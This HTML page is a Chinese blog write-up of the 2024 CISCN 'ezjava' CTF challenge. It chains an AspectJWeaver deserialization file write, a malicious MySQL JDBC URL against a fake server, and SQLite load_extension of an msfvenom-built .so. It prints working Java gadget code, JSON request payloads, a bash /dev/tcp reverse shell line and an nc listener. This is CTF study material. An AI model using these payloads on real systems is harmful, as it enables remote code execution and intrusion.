<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>2024CISCN ezjava复现 - WayneJH Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="WayneJH Blog"><meta name="msapplication-TileImage" content="https://oss.waynejoons.icu/picphoto/favicon.ico"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="WayneJH Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights. Here you can learn a lot about cybersecurity knowledge"><meta property="og:type" content="blog"><meta property="og:title" content="2024CISCN ezjava复现"><meta property="og:url" content="https://waynejoon.github.io/posts/2024CISCN_ezjava/"><meta property="og:site_name" content="WayneJH Blog"><meta property="og:description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights. Here you can learn a lot about cybersecurity knowledge"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://waynejoon.github.io/img/waynejoon.jpg"><meta property="article:published_time" content="2025-11-04T08:23:46.000Z"><meta property="article:modified_time" content="2025-11-04T08:34:52.395Z"><meta property="article:author" content="WayneJoon.H"><meta property="article:tag" content="代码审计"><meta property="article:tag" content="Java安全"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://waynejoon.github.io/img/waynejoon.jpg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://waynejoon.github.io/posts/2024CISCN_ezjava/"},"headline":"2024CISCN ezjava复现","image":["https://waynejoon.github.io/img/waynejoon.jpg"],"datePublished":"2025-11-04T08:23:46.000Z","dateModified":"2025-11-04T08:34:52.395Z","author":{"@type":"Person","name":"WayneJoon.H"},"publisher":{"@type":"Organization","name":"WayneJH Blog","logo":{"@type":"ImageObject","url":{"text":"WayneJH"}}},"description":"2024CISCN ezjava复现分析"}</script><link rel="canonical" href="https://waynejoon.github.io/posts/2024CISCN_ezjava/"><link rel="icon" href="https://oss.waynejoons.icu/picphoto/favicon.ico"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="WayneJH Blog" type="application/atom+xml">
</head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">WayneJH</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/links">友链</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2025-11-04T08:23:46.000Z" title="2025/11/4 16:23:46">2025-11-04</time>发表</span><span class="level-item"><a class="link-muted" href="/categories/Java%E5%AE%89%E5%85%A8/">Java安全</a></span><span class="level-item">10 分钟读完 (大约1511个字)</span><span class="level-item" id="busuanzi_container_page_pv" style="display:none"><span id="busuanzi_value_page_pv">--</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">2024CISCN ezjava复现</h1><div class="content"><h2 id="起点"><a href="#起点" class="headerlink" title="起点"></a>起点</h2><p>首先打开题目，可以看到一个JDBC连接页面</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104095853759.png"></p>
<p>猜测题目是跟JDBC ATTACK有关，把题目给的附件<code>app.jar</code>扔到jadx逆向还原，导出源码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104100422854.png"></p>
<h2 id="源码分析"><a href="#源码分析" class="headerlink" title="源码分析"></a>源码分析</h2><p>用IDEA打开导出的源码，进入<code>com/example/jdbctest</code>目录分析</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104101139426.png"></p>
<p>分析发现<code>controller/JdbcController.java</code>定义了请求路由</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104101433633.png"></p>
<p>关注<code>services/DatasourceServiceImpl.java</code>，发现其定义了数据库连接的类型，其中url可控且存在利用点，类型1对应Mysql，类型3对应Sqlite</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104102101312.png"></p>
<p>那我们可以尝试打MySQL JDBC反序列化写文件和SQLite SSRF读文件，但是具体怎么打呢</p>
<p>继续分析，在<code>META-INF/maven/com.example/jdbcTest/pom.xml</code>发现<code>aspectjweaver</code></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104104326087.png"></p>
<p>同时关注到<code>bean/UserBean.java</code>有个<code>readObject</code>可以执行反序列化，且里面参数可控</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104104545366.png"></p>
<p>可以打<code>aspectjweaver</code>反序列化，那思路就很清晰了，我们通过<code>aspectjweaver</code>反序列化写恶意so文件，然后用mysql jdbc反序列化开虚假mysql服务写入恶意文件，最后用sqlite ssrf加载so文件即可</p>
<h2 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h2><h3 id="AspectJWeaver反序列化"><a href="#AspectJWeaver反序列化" class="headerlink" title="AspectJWeaver反序列化"></a>AspectJWeaver反序列化</h3><p><code>aspectjweaver</code>中有一个<code>SimpleCache</code>类，<code>SimpleCache</code>类中的内部类<code>StoreableCachingMap</code>是一个继承<code>HashMap</code>的类，其重写了<code>HashMap</code>的<code>put</code>方法，<code>put</code>方法中的<code>writeToPath</code>方法执行了写入文件的操作</p>
<p>具体可以参考文章：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/10945">AspectJWeaver反序列化利用链</a></p>
<p>然后我们重新看看<code>UserBean.java</code>，里面的<code>name</code>、<code>age</code>都可控，<code>obj</code>可控因此a也可控，且内容<code>age</code>会进行base64解码后再写入</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104104545366.png"></p>
<p>可以通过反射来获取属性，用<code>setAccessible</code>绕过访问限制，再修改其对应的值，可以参考上面文章的简单demo部分来写</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104110523497.png"></p>
<p>具体payload如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.example.test;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.util.Base64;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Main</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Constructor</span> <span class="variable">con</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap&quot;</span>).getDeclaredConstructor(String.class,<span class="type">int</span>.class);</span><br><span class="line">        con.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">HashMap</span> <span class="variable">map</span> <span class="operator">=</span> (HashMap)con.newInstance(<span class="string">&quot;/tmp/&quot;</span>, <span class="number">1</span>); <span class="comment">//存放路径，必须要存在的</span></span><br><span class="line">        <span class="type">Constructor</span> <span class="variable">constructor</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;com.example.jdbctest.bean.UserBean&quot;</span>).getDeclaredConstructor();</span><br><span class="line">        constructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">Object</span> <span class="variable">userBean</span> <span class="operator">=</span> constructor.newInstance();</span><br><span class="line">        <span class="type">Class</span> <span class="variable">cls</span> <span class="operator">=</span> userBean.getClass();</span><br><span class="line">        <span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> cls.getDeclaredField(<span class="string">&quot;obj&quot;</span>);</span><br><span class="line">        field.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        field.set(userBean, map);</span><br><span class="line">        <span class="type">Field</span> <span class="variable">field1</span> <span class="operator">=</span> cls.getDeclaredField(<span class="string">&quot;name&quot;</span>);</span><br><span class="line">        field1.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        field1.set(userBean, <span class="string">&quot;evil.so&quot;</span>); <span class="comment">//文件名</span></span><br><span class="line">        <span class="type">Field</span> <span class="variable">field2</span> <span class="operator">=</span> cls.getDeclaredField(<span class="string">&quot;age&quot;</span>);</span><br><span class="line">        field2.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">String</span> <span class="variable">payload</span> <span class="operator">=</span> <span class="string">&quot;&quot;</span>; <span class="comment">//文件内容</span></span><br><span class="line">        field2.set(userBean, payload);</span><br><span class="line">        <span class="type">byte</span>[] bytes = serialize(userBean);</span><br><span class="line">        System.out.println(<span class="keyword">new</span> <span class="title class_">String</span>(Base64.getEncoder().encode(bytes)));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] serialize(<span class="keyword">final</span> Object obj) <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">ByteArrayOutputStream</span> <span class="variable">btout</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">objOut</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(btout);</span><br><span class="line">        objOut.writeObject(obj);</span><br><span class="line">        <span class="keyword">return</span> btout.toByteArray();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>文件内容我们就写恶意so文件导出的base64编码</p>
<p>先将要执行的命令进行base64编码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">bash -c <span class="string">&quot;bash -i &gt;&amp; /dev/tcp/你的vps地址/8888 0&gt;&amp;1&quot;</span></span><br><span class="line"></span><br><span class="line">得到 YmFzaCAtYyAiYmFzaCAtaSA+Jxxxxxxx</span><br></pre></td></tr></table></figure>

<p>用msfvenom创建恶意so文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p linux/x64/exec CMD=<span class="string">&#x27;echo 编码后的内容|base64 -d|bash&#x27;</span> -f elf-so -o evil.so</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20251104112031547.png"></p>
<p>接着执行<code>cat evil.so | base64 -w0</code>获取so文件编码后的内容，<code>base64 -w0</code>表示不换行</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104112131693.png"></p>
<p>复制这段内容到payload里面，执行获取编码后的序列化数据</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104112446399.png"></p>
<h3 id="MySQL-JDBC反序列化"><a href="#MySQL-JDBC反序列化" class="headerlink" title="MySQL JDBC反序列化"></a>MySQL JDBC反序列化</h3><p>接下来就是打mysql jdbc反序列化写文件，制作虚假mysql服务</p>
<p>原理可以参考：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/7754">MySQL JDBC 反序列化漏洞分析</a></p>
<p>这里用工具<code>Fake Server</code>来制作虚假服务，链接：<a target="_blank" rel="noopener" href="https://github.com/4ra1n/mysql-fake-server">https://github.com/4ra1n/mysql-fake-server</a></p>
<p>把上面执行得到的序列化数据写入Gadget，如图所示，按顺序执行</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104150159897.png"></p>
<p>ip这里要说下，由于一般本地电脑是没有公网ip的，你写自己的电脑ip进去是不行的，那怎么办，建议最好有个服务器吧，在服务器部署frp服务，然后内网穿透进行反向代理，可以参考文章<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_46263867/article/details/149537197?spm=1001.2014.3001.5502">内网穿透神器FRP部署教程</a>，快的话十几分钟就可以，或者你买个短期的静态ip地址来用</p>
<p>我这里用frp进行反向代理连接我本地的端口</p>
<p>弄完之后，点击<code>Copy Payload</code>复制payload，然后重新打开题目网页选择Mysql随便输入内容抓个包，看看格式</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104152542399.png"></p>
<p>把里面的url改成我们刚才复制的payload，然后发包</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;type&quot;</span><span class="punctuation">:</span><span class="string">&quot;1&quot;</span><span class="punctuation">,</span><span class="attr">&quot;url&quot;</span><span class="punctuation">:</span><span class="string">&quot;jdbc:mysql://ip:port/test?autoDeserialize=true&amp;queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&amp;user=base64ZGVzZXJfQ1VTVE9N&quot;</span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>获得如下结果就说明成功了</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104152943753.png"></p>
<h3 id="SQLite-JDBC加载恶意动态链接库"><a href="#SQLite-JDBC加载恶意动态链接库" class="headerlink" title="SQLite JDBC加载恶意动态链接库"></a>SQLite JDBC加载恶意动态链接库</h3><p>最后就是通过SQLite加载恶意文件</p>
<p>可以参考文章：<a target="_blank" rel="noopener" href="https://gitcode.com/gh_mirrors/ja/JavaSec/blob/main/9.JDBC%20Attack/SQLite/index.md?utm_source=csdn_blog_hover">SQLite With SSRF</a></p>
<p>先在服务器开启nc监听</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 8888</span><br></pre></td></tr></table></figure>

<p>然后构造payload发包，由于<code>load_extension</code>默认是关闭的，需要<code>enable_load_extension=true</code>开启才能用</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;type&quot;</span><span class="punctuation">:</span><span class="string">&quot;3&quot;</span><span class="punctuation">,</span><span class="attr">&quot;tableName&quot;</span><span class="punctuation">:</span><span class="string">&quot;(select(load_extension(\&quot;/tmp/evil.so\&quot;)));&quot;</span><span class="punctuation">,</span><span class="attr">&quot;url&quot;</span><span class="punctuation">:</span><span class="string">&quot;jdbc:sqlite:file:/tmp/db?enable_load_extension=true&quot;</span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>成功反弹shell</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104153549961.png"></p>
<p>读取flag文件发现权限不够，<code>ls -l</code>查看权限，发现flag没有执行权限，但是readflag存在执行权限，直接执行获取flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251104153655376.png"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这道题用到了很多知识点，包括AspectJWeaver反序列化、MySQL JDBC反序列化和SQLite SSRF等，总体来说有些难度，也是参考了很多资料，建议深入学习这些知识点，尤其是JDBC方面的漏洞和Java反射机制，做题做下来感觉基础很重要，学好了做这种题就会轻松很多，与君共勉，继续加油！！</p>
</div><div class="article-licensing box"><div class="licensing-title"><p>2024CISCN ezjava复现</p><p><a href="https://waynejoon.github.io/posts/2024CISCN_ezjava/">https://waynejoon.github.io/posts/2024CISCN_ezjava/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>WayneJoon.H</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2025-11-04</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="level is-mobile is-flex"><div class="article-tags is-size-7 is-uppercase"><i class="fas fa-tags has-text-grey"></i> <a class="link-muted" rel="tag" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计, </a><a class="link-muted" rel="tag" href="/tags/Java%E5%AE%89%E5%85%A8/">Java安全 </a></div></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/posts/Python-Stack-Frame-Sandbox-Escape/"><span class="level-item">Python栈帧沙箱逃逸</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="/img/waynejoon.jpg" alt="WayneJoon.H"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">WayneJoon.H</p><p class="is-size-6 is-block">记录学习生活</p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives/"><p class="title">29</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories/"><p class="title">7</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags/"><p class="title">10</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/waynejoon" target="_blank" rel="me noopener">关注我</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Github" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#起点"><span class="level-left"><span class="level-item">1</span><span class="level-item">起点</span></span></a></li><li><a class="level is-mobile" href="#源码分析"><span class="level-left"><span class="level-item">2</span><span class="level-item">源码分析</span></span></a></li><li><a class="level is-mobile" href="#利用过程"><span class="level-left"><span class="level-item">3</span><span class="level-item">利用过程</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#AspectJWeaver反序列化"><span class="level-left"><span class="level-item">3.1</span><span class="level-item">AspectJWeaver反序列化</span></span></a></li><li><a class="level is-mobile" href="#MySQL-JDBC反序列化"><span class="level-left"><span class="level-item">3.2</span><span class="level-item">MySQL JDBC反序列化</span></span></a></li><li><a class="level is-mobile" href="#SQLite-JDBC加载恶意动态链接库"><span class="level-left"><span class="level-item">3.3</span><span class="level-item">SQLite JDBC加载恶意动态链接库</span></span></a></li></ul></li><li><a class="level is-mobile" href="#总结"><span class="level-left"><span class="level-item">4</span><span class="level-item">总结</span></span></a></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/">WayneJH</a><p class="is-size-7"><span>&copy; 2025 WayneJoon.H</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script data-pjax src="/js/busuanzi-fix.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.min.js"></script><script src="/js/pjax.js"></script><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script data-pjax src="/js/insight.js" defer></script><script data-pjax>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>